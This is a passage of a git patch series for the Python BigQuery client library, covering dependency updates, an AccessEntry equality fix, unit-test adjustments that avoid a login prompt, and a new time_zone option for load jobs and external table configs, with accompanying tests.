-1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 824a1df4a..ee895a4f4 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 379d682b4..f8f79a970 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.4.26 +certifi==2025.6.15 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 4b9c515a7..b3046227c 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 4b9c515a7..b3046227c 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index d311187ec..d71018b3f 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 From 4941de441cb32cabeb55ec0320f305fb62551155 Mon Sep 17 00:00:00 2001 From: Prabakar <86585391+drokeye@users.noreply.github.com> Date: Thu, 26 Jun 2025 23:28:53 +0530 Subject: [PATCH 137/202] fix: make AccessEntry 
equality consistent with from_api_repr (#2218) * fix: make AccessEntry equality consistent for view entity type * fix: make AccessEntry equality consistent for view entity type * fix: use json.dumps() for normalization of entity_id * remove trailing whitespace and add test assertions * revert back to the original code * fix linting in `dataset.py` * fix linting in `test_dataset.py` --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/dataset.py | 17 +++++++- tests/unit/test_dataset.py | 67 ++++++++++++++++++++++++++++++++ 2 files changed, 82 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index ec4098511..878b77d41 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -17,6 +17,7 @@ from __future__ import absolute_import import copy +import json import typing from typing import Optional, List, Dict, Any, Union @@ -506,7 +507,20 @@ def entity_id(self) -> Optional[Union[Dict[str, Any], str]]: def __eq__(self, other): if not isinstance(other, AccessEntry): return NotImplemented - return self._key() == other._key() + return ( + self.role == other.role + and self.entity_type == other.entity_type + and self._normalize_entity_id(self.entity_id) + == self._normalize_entity_id(other.entity_id) + and self.condition == other.condition + ) + + @staticmethod + def _normalize_entity_id(value): + """Ensure consistent equality for dicts like 'view'.""" + if isinstance(value, dict): + return json.dumps(value, sort_keys=True) + return value def __ne__(self, other): return not self == other @@ -557,7 +571,6 @@ def from_api_repr(cls, resource: dict) -> "AccessEntry": google.cloud.bigquery.dataset.AccessEntry: Access entry parsed from ``resource``.
""" - access_entry = cls() access_entry._properties = resource.copy() return access_entry diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 3fd2579af..604e5ed2e 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -1767,3 +1767,70 @@ def test__hash__with_minimal_inputs(self): description=None, ) assert hash(cond1) is not None + + def test_access_entry_view_equality(self): + from google.cloud import bigquery + + entry1 = bigquery.dataset.AccessEntry( + entity_type="view", + entity_id={ + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "my_table", + }, + ) + entry2 = bigquery.dataset.AccessEntry.from_api_repr( + { + "view": { + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "my_table", + } + } + ) + + entry3 = bigquery.dataset.AccessEntry( + entity_type="routine", + entity_id={ + "projectId": "my_project", + "datasetId": "my_dataset", + "routineId": "my_routine", + }, + ) + + entry4 = bigquery.dataset.AccessEntry.from_api_repr( + { + "routine": { + "projectId": "my_project", + "datasetId": "my_dataset", + "routineId": "my_routine", + } + } + ) + + entry5 = bigquery.dataset.AccessEntry( + entity_type="dataset", + entity_id={ + "dataset": { + "projectId": "my_project", + "datasetId": "my_dataset", + }, + "target_types": "VIEWS", + }, + ) + + entry6 = bigquery.dataset.AccessEntry.from_api_repr( + { + "dataset": { + "dataset": { + "projectId": "my_project", + "datasetId": "my_dataset", + }, + "target_types": "VIEWS", + } + } + ) + + assert entry1 == entry2 + assert entry3 == entry4 + assert entry5 == entry6 From 37e4e0ed8e6ffba6584a37131f03cb77b4fcfe64 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 27 Jun 2025 21:00:19 +0200 Subject: [PATCH 138/202] chore(deps): update all dependencies (#2224) --- samples/geography/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt 
index f8f79a970..68f6c1662 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -4,13 +4,13 @@ cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' click==8.2.1; python_version >= '3.10' -click-plugins==1.1.1 +click-plugins==1.1.1.2 cligj==0.7.2 db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' -geopandas==1.1.0; python_version >= '3.10' +geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 google-cloud-bigquery==3.34.0 @@ -19,7 +19,7 @@ google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.73.0 +grpcio==1.73.1 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 From 27ff3a89a5f97305fa3ff673aa9183baa7df200f Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 2 Jul 2025 17:00:39 -0400 Subject: [PATCH 139/202] =?UTF-8?q?fix:=20adds=20magics.context.project=20?= =?UTF-8?q?to=20eliminate=20issues=20with=20unit=20tests=20=E2=80=A6=20(#2?= =?UTF-8?q?228)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds `magics.context.project` to eliminate issues with unit tests in an upcoming PR. Several magics unit tests fail with an error message. If the test does not have knowledge of the project, it attempts to initiate a login sequence to be able to get the project identifier. The login cannot complete because the process is running in an ipython interpreter and pytest does not capture any input. This change provides an explicit reference to a project to avoid that process. ``` Please visit this URL to authorize this application: [REDACTED DUE TO SPACE REASONS] self = <_pytest.capture.DontReadFromInput object at 0x7f55d6821bd0>, size = -1 def read(self, size: int = -1) -> str: > raise OSError( "pytest: reading from stdin while output is captured! Consider using `-s`.") E OSError: pytest: reading from stdin while output is captured! 
Consider using `-s`. .nox/unit-3-11/lib/python3.11/site-packages/_pytest/capture.py:229: OSError ``` --- tests/unit/test_magics.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index 814150693..c79e923f8 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -986,6 +986,7 @@ def test_bigquery_magic_dryrun_option_sets_job_config(monkeypatch): google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) @@ -1007,6 +1008,7 @@ def test_bigquery_magic_dryrun_option_returns_query_job(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1035,6 +1037,7 @@ def test_bigquery_magic_dryrun_option_variable_error_message( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" ipython_ns_cleanup.append((ip, "q_job")) run_query_patch = mock.patch( @@ -1064,6 +1067,7 @@ def test_bigquery_magic_dryrun_option_saves_query_job_to_variable( magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1098,6 +1102,7 @@ def test_bigquery_magic_saves_query_job_to_variable_on_error( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" ipython_ns_cleanup.append((ip, "result")) client_query_patch = mock.patch( From 7ed9fd293ab1181b5b7b97e7e9ec82aade56e7ef Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 7 Jul 2025 22:52:24 +0200 Subject: [PATCH 140/202] chore(deps): update all 
dependencies (#2226) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [bigquery-magics](https://redirect.github.com/googleapis/python-bigquery-magics) | `==0.10.0` -> `==0.10.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/bigquery-magics/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/bigquery-magics/0.10.0/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [bigquery_magics](https://redirect.github.com/googleapis/python-bigquery-magics) | `==0.10.0` -> `==0.10.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/bigquery-magics/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/bigquery-magics/0.10.0/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [ipython](https://redirect.github.com/ipython/ipython) | `==9.3.0` -> `==9.4.0` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/ipython/9.4.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ipython/9.3.0/9.4.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [pandas](https://redirect.github.com/pandas-dev/pandas) | `==2.3.0` -> `==2.3.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/pandas/2.3.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pandas/2.3.0/2.3.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [pytest-xdist](https://redirect.github.com/pytest-dev/pytest-xdist) ([changelog](https://pytest-xdist.readthedocs.io/en/latest/changelog.html)) | `==3.7.0` -> `==3.8.0` | 
[![age](https://developer.mend.io/api/mc/badges/age/pypi/pytest-xdist/3.8.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pytest-xdist/3.7.0/3.8.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [typing-extensions](https://redirect.github.com/python/typing_extensions) ([changelog](https://redirect.github.com/python/typing_extensions/blob/main/CHANGELOG.md)) | `==4.14.0` -> `==4.14.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/typing-extensions/4.14.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/typing-extensions/4.14.0/4.14.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes
googleapis/python-bigquery-magics (bigquery-magics) ### [`v0.10.1`](https://redirect.github.com/googleapis/python-bigquery-magics/blob/HEAD/CHANGELOG.md#0101-2025-07-07) [Compare Source](https://redirect.github.com/googleapis/python-bigquery-magics/compare/v0.10.0...v0.10.1) ##### Dependencies - Move spanner-graph-notebook back to version 1.1.6 ([#​126](https://redirect.github.com/googleapis/python-bigquery-magics/issues/126)) ([17ee695](https://redirect.github.com/googleapis/python-bigquery-magics/commit/17ee6956c8fec740440836609a9106e900b63074))
ipython/ipython (ipython) ### [`v9.4.0`](https://redirect.github.com/ipython/ipython/compare/9.3.0...9.4.0) [Compare Source](https://redirect.github.com/ipython/ipython/compare/9.3.0...9.4.0)
pandas-dev/pandas (pandas) ### [`v2.3.1`](https://redirect.github.com/pandas-dev/pandas/releases/tag/v2.3.1): Pandas 2.3.1 [Compare Source](https://redirect.github.com/pandas-dev/pandas/compare/v2.3.0...v2.3.1) We are pleased to announce the release of pandas 2.3.1. This release includes some improvements and fixes to the future string data type (preview feature for the upcoming pandas 3.0). We recommend that all users upgrade to this version. See the [full whatsnew](https://pandas.pydata.org/pandas-docs/version/2.3.1/whatsnew/v2.3.1.html) for a list of all the changes. Pandas 2.3.1 supports Python 3.9 and higher. The release will be available on the conda-forge channel: ``` conda install pandas --channel conda-forge ``` Or via PyPI: ``` python3 -m pip install --upgrade pandas ``` Please report any issues with the release on the [pandas issue tracker](https://redirect.github.com/pandas-dev/pandas/issues). Thanks to all the contributors who made this release possible.
pytest-dev/pytest-xdist (pytest-xdist) ### [`v3.8.0`](https://redirect.github.com/pytest-dev/pytest-xdist/blob/HEAD/CHANGELOG.rst#pytest-xdist-380-2025-06-30) [Compare Source](https://redirect.github.com/pytest-dev/pytest-xdist/compare/v3.7.0...v3.8.0) \=============================== ## Features - `#​1083 `\_: Add `--no-loadscope-reorder` and `--loadscope-reorder` option to control whether to automatically reorder tests in loadscope for tests where relative ordering matters. This only applies when using `loadscope`. For example, \[test\_file\_1, test\_file\_2, ..., test\_file\_n] are given as input test files, if `--no-loadscope-reorder` is used, for either worker, the `test_file_a` will be executed before `test_file_b` only if `a < b`. The default behavior is to reorder the tests to maximize the number of tests that can be executed in parallel.
python/typing_extensions (typing-extensions) ### [`v4.14.1`](https://redirect.github.com/python/typing_extensions/blob/HEAD/CHANGELOG.md#Release-4141-July-4-2025) [Compare Source](https://redirect.github.com/python/typing_extensions/compare/4.14.0...4.14.1) - Fix usage of `typing_extensions.TypedDict` nested inside other types (e.g., `typing.Type[typing_extensions.TypedDict]`). This is not allowed by the type system but worked on older versions, so we maintain support.
--- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 4 ++-- samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements-test.txt | 2 +- 8 files changed, 12 insertions(+), 12 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index b3046227c..3bf52c85d 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index ee895a4f4..d449b373b 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 68f6c1662..5b342fe5c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@
idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.3.0 +pandas==2.3.1 proto-plus==1.26.1 pyarrow==20.0.0 pyasn1==0.6.1 @@ -39,6 +39,6 @@ rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' six==1.17.0 -typing-extensions==4.14.0 +typing-extensions==4.14.1 typing-inspect==0.9.0 urllib3==2.5.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index b3046227c..3bf52c85d 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index d2456fc5a..b53a35982 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.10.0 +bigquery_magics==0.10.1 db-dtypes==1.4.3 google.cloud.bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 -pandas==2.3.0 +pandas==2.3.1 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index b3046227c..3bf52c85d 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 66409e49d..4b134ac9d 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ -bigquery-magics==0.10.0 +bigquery-magics==0.10.1 db-dtypes==1.4.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' -ipython==9.3.0; python_version >= '3.10' +ipython==9.4.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.3; python_version >= '3.10' -pandas==2.3.0 +pandas==2.3.1 
diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index d71018b3f..cef3450e1 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -2,4 +2,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 From b2300d032843512b7e4a5703377632fe60ef3f8d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 9 Jul 2025 19:12:23 -0400 Subject: [PATCH 141/202] feat: adds time_zone to external config and load job (#2229) This commit introduces new configuration options for BigQuery load jobs and external table definitions, aligning with recent updates to the underlying protos. New options added: `time_zone`: Time zone used when parsing timestamp values that do not have specific time zone information. (Applies to `LoadJobConfig`, `LoadJob`, and `ExternalConfig`) Changes include: Added corresponding properties (getters/setters) to `LoadJobConfig`, `LoadJob`, and `ExternalConfig`. Updated docstrings and type hints for all new attributes. Updated unit tests to cover the new options, ensuring they are correctly handled during object initialization, serialization to API representation, and deserialization from API responses. 
--- google/cloud/bigquery/external_config.py | 17 +++ google/cloud/bigquery/job/load.py | 21 ++++ tests/unit/job/test_load.py | 32 ++++++ tests/unit/job/test_load_config.py | 127 +++++++++++++++++++++++ tests/unit/test_external_config.py | 7 ++ 5 files changed, 204 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index cb8141cd0..fcfcaca20 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -848,6 +848,23 @@ def schema(self, value): prop = {"fields": [field.to_api_repr() for field in value]} self._properties["schema"] = prop + @property + def time_zone(self) -> Optional[str]: + """Optional[str]: Time zone used when parsing timestamp values that do not + have specific time zone information (e.g. 2024-04-20 12:34:56). The expected + format is an IANA timezone string (e.g. America/Los_Angeles). + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.time_zone + """ + + result = self._properties.get("timeZone") + return typing.cast(str, result) + + @time_zone.setter + def time_zone(self, value: Optional[str]): + self._properties["timeZone"] = value + @property def connection_id(self): """Optional[str]: [Experimental] ID of a BigQuery Connection API diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index e56ce16f0..5d49aef18 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -548,6 +548,20 @@ def source_format(self): def source_format(self, value): self._set_sub_prop("sourceFormat", value) + @property + def time_zone(self) -> Optional[str]: + """Optional[str]: Default time zone that will apply when parsing timestamp + values that have no specific time zone. 
+ + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.time_zone + """ + return self._get_sub_prop("timeZone") + + @time_zone.setter + def time_zone(self, value: Optional[str]): + self._set_sub_prop("timeZone", value) + @property def time_partitioning(self): """Optional[google.cloud.bigquery.table.TimePartitioning]: Specifies time-based @@ -889,6 +903,13 @@ def clustering_fields(self): """ return self.configuration.clustering_fields + @property + def time_zone(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.time_zone`. + """ + return self.configuration.time_zone + @property def schema_update_options(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 10df46fb3..81d8e44b4 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -38,10 +38,14 @@ def _setUpConstants(self): self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" + self.TIME_ZONE = "UTC" + def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] + + config["timeZone"] = self.TIME_ZONE config["destinationTable"] = { "projectId": self.PROJECT, "datasetId": self.DS_ID, @@ -152,6 +156,10 @@ def _verifyResourceProperties(self, job, resource): ) else: self.assertIsNone(job.destination_encryption_configuration) + if "timeZone" in config: + self.assertEqual(job.time_zone, config["timeZone"]) + else: + self.assertIsNone(job.time_zone) def test_ctor(self): client = _make_client(project=self.PROJECT) @@ -195,6 +203,8 @@ def test_ctor(self): self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) + self.assertIsNone(job.time_zone) + def test_ctor_w_config(self): from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.job import LoadJobConfig @@ -431,6 +441,24 @@ def 
test_from_api_repr_w_properties(self): self.assertIs(job._client, client) self._verifyResourceProperties(job, RESOURCE) + def test_to_api_repr(self): + self._setUpConstants() + client = _make_client(project=self.PROJECT) + RESOURCE = self._make_resource(ended=False) + + klass = self._get_target_class() + job = klass.from_api_repr(RESOURCE, client) + api_repr = job.to_api_repr() + + # as per the documentation in load.py -> LoadJob.to_api_repr(), + # the return value from to_api_repr should not include statistics + expected = { + "jobReference": RESOURCE["jobReference"], + "configuration": RESOURCE["configuration"], + } + + self.assertEqual(api_repr, expected) + def test_begin_w_already_running(self): conn = make_connection() client = _make_client(project=self.PROJECT, connection=conn) @@ -571,6 +599,7 @@ def test_begin_w_alternate_client(self): ] }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], + "timeZone": self.TIME_ZONE, } RESOURCE["configuration"]["load"] = LOAD_CONFIGURATION conn1 = make_connection() @@ -599,6 +628,9 @@ def test_begin_w_alternate_client(self): config.write_disposition = WriteDisposition.WRITE_TRUNCATE config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" + + config.time_zone = self.TIME_ZONE + with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" ) as final_attributes: diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 3a681c476..6424f7e68 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -828,6 +828,22 @@ def test_write_disposition_setter(self): config._properties["load"]["writeDisposition"], write_disposition ) + def test_time_zone_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.time_zone) + + def test_time_zone_hit(self): + time_zone = "UTC" + config = self._get_target_class()() + 
config._properties["load"]["timeZone"] = time_zone + self.assertEqual(config.time_zone, time_zone) + + def test_time_zone_setter(self): + time_zone = "America/New_York" + config = self._get_target_class()() + config.time_zone = time_zone + self.assertEqual(config._properties["load"]["timeZone"], time_zone) + def test_parquet_options_missing(self): config = self._get_target_class()() self.assertIsNone(config.parquet_options) @@ -901,3 +917,114 @@ def test_column_name_character_map_none(self): config._properties["load"]["columnNameCharacterMap"], ColumnNameCharacterMap.COLUMN_NAME_CHARACTER_MAP_UNSPECIFIED, ) + + RESOURCE = { + "load": { + "allowJaggedRows": True, + "createDisposition": "CREATE_NEVER", + "encoding": "UTF-8", + "fieldDelimiter": ",", + "ignoreUnknownValues": True, + "maxBadRecords": 10, + "nullMarker": "\\N", + "quote": '"', + "schema": { + "fields": [ + {"name": "name", "type": "STRING", "mode": "NULLABLE"}, + {"name": "age", "type": "INTEGER", "mode": "NULLABLE"}, + ] + }, + "skipLeadingRows": "1", + "sourceFormat": "CSV", + "timePartitioning": { + "type": "DAY", + "field": "transaction_date", + }, + "useAvroLogicalTypes": True, + "writeDisposition": "WRITE_TRUNCATE", + "timeZone": "America/New_York", + "parquetOptions": {"enableListInference": True}, + "columnNameCharacterMap": "V2", + "someNewField": "some-value", + } + } + + def test_from_api_repr(self): + from google.cloud.bigquery.job import ( + CreateDisposition, + LoadJobConfig, + SourceFormat, + WriteDisposition, + ) + from google.cloud.bigquery.schema import SchemaField + from google.cloud.bigquery.table import TimePartitioning, TimePartitioningType + + from google.cloud.bigquery.job.load import ColumnNameCharacterMap + + config = LoadJobConfig.from_api_repr(self.RESOURCE) + + self.assertTrue(config.allow_jagged_rows) + self.assertEqual(config.create_disposition, CreateDisposition.CREATE_NEVER) + self.assertEqual(config.encoding, "UTF-8") + self.assertEqual(config.field_delimiter, ",") + 
self.assertTrue(config.ignore_unknown_values) + self.assertEqual(config.max_bad_records, 10) + self.assertEqual(config.null_marker, "\\N") + self.assertEqual(config.quote_character, '"') + self.assertEqual( + config.schema, + [SchemaField("name", "STRING"), SchemaField("age", "INTEGER")], + ) + self.assertEqual(config.skip_leading_rows, 1) + self.assertEqual(config.source_format, SourceFormat.CSV) + self.assertEqual( + config.time_partitioning, + TimePartitioning(type_=TimePartitioningType.DAY, field="transaction_date"), + ) + self.assertTrue(config.use_avro_logical_types) + self.assertEqual(config.write_disposition, WriteDisposition.WRITE_TRUNCATE) + self.assertEqual(config.time_zone, "America/New_York") + self.assertTrue(config.parquet_options.enable_list_inference) + self.assertEqual(config.column_name_character_map, ColumnNameCharacterMap.V2) + self.assertEqual(config._properties["load"]["someNewField"], "some-value") + + def test_to_api_repr(self): + from google.cloud.bigquery.job import ( + CreateDisposition, + LoadJobConfig, + SourceFormat, + WriteDisposition, + ) + from google.cloud.bigquery.schema import SchemaField + from google.cloud.bigquery.table import TimePartitioning, TimePartitioningType + from google.cloud.bigquery.format_options import ParquetOptions + from google.cloud.bigquery.job.load import ColumnNameCharacterMap + + config = LoadJobConfig() + config.allow_jagged_rows = True + config.create_disposition = CreateDisposition.CREATE_NEVER + config.encoding = "UTF-8" + config.field_delimiter = "," + config.ignore_unknown_values = True + config.max_bad_records = 10 + config.null_marker = r"\N" + config.quote_character = '"' + config.schema = [SchemaField("name", "STRING"), SchemaField("age", "INTEGER")] + config.skip_leading_rows = 1 + config.source_format = SourceFormat.CSV + config.time_partitioning = TimePartitioning( + type_=TimePartitioningType.DAY, field="transaction_date" + ) + config.use_avro_logical_types = True + config.write_disposition 
= WriteDisposition.WRITE_TRUNCATE + config.time_zone = "America/New_York" + parquet_options = ParquetOptions() + parquet_options.enable_list_inference = True + config.parquet_options = parquet_options + config.column_name_character_map = ColumnNameCharacterMap.V2 + config._properties["load"]["someNewField"] = "some-value" + + api_repr = config.to_api_repr() + + expected = self.RESOURCE + self.assertEqual(api_repr, expected) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 7f84a9f5b..a89b7a1fb 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -26,6 +26,8 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] + TIME_ZONE = "America/Los_Angeles" + BASE_RESOURCE = { "sourceFormat": "", "sourceUris": SOURCE_URIS, @@ -33,6 +35,7 @@ class TestExternalConfig(unittest.TestCase): "autodetect": True, "ignoreUnknownValues": False, "compression": "compression", + "timeZone": TIME_ZONE, } def test_from_api_repr_base(self): @@ -79,6 +82,7 @@ def test_to_api_repr_base(self): ec.connection_id = "path/to/connection" ec.schema = [schema.SchemaField("full_name", "STRING", mode="REQUIRED")] + ec.time_zone = self.TIME_ZONE exp_schema = { "fields": [{"name": "full_name", "type": "STRING", "mode": "REQUIRED"}] } @@ -92,6 +96,7 @@ def test_to_api_repr_base(self): "compression": "compression", "connectionId": "path/to/connection", "schema": exp_schema, + "timeZone": self.TIME_ZONE, } self.assertEqual(got_resource, exp_resource) @@ -128,6 +133,8 @@ def _verify_base(self, ec): self.assertEqual(ec.max_bad_records, 17) self.assertEqual(ec.source_uris, self.SOURCE_URIS) + 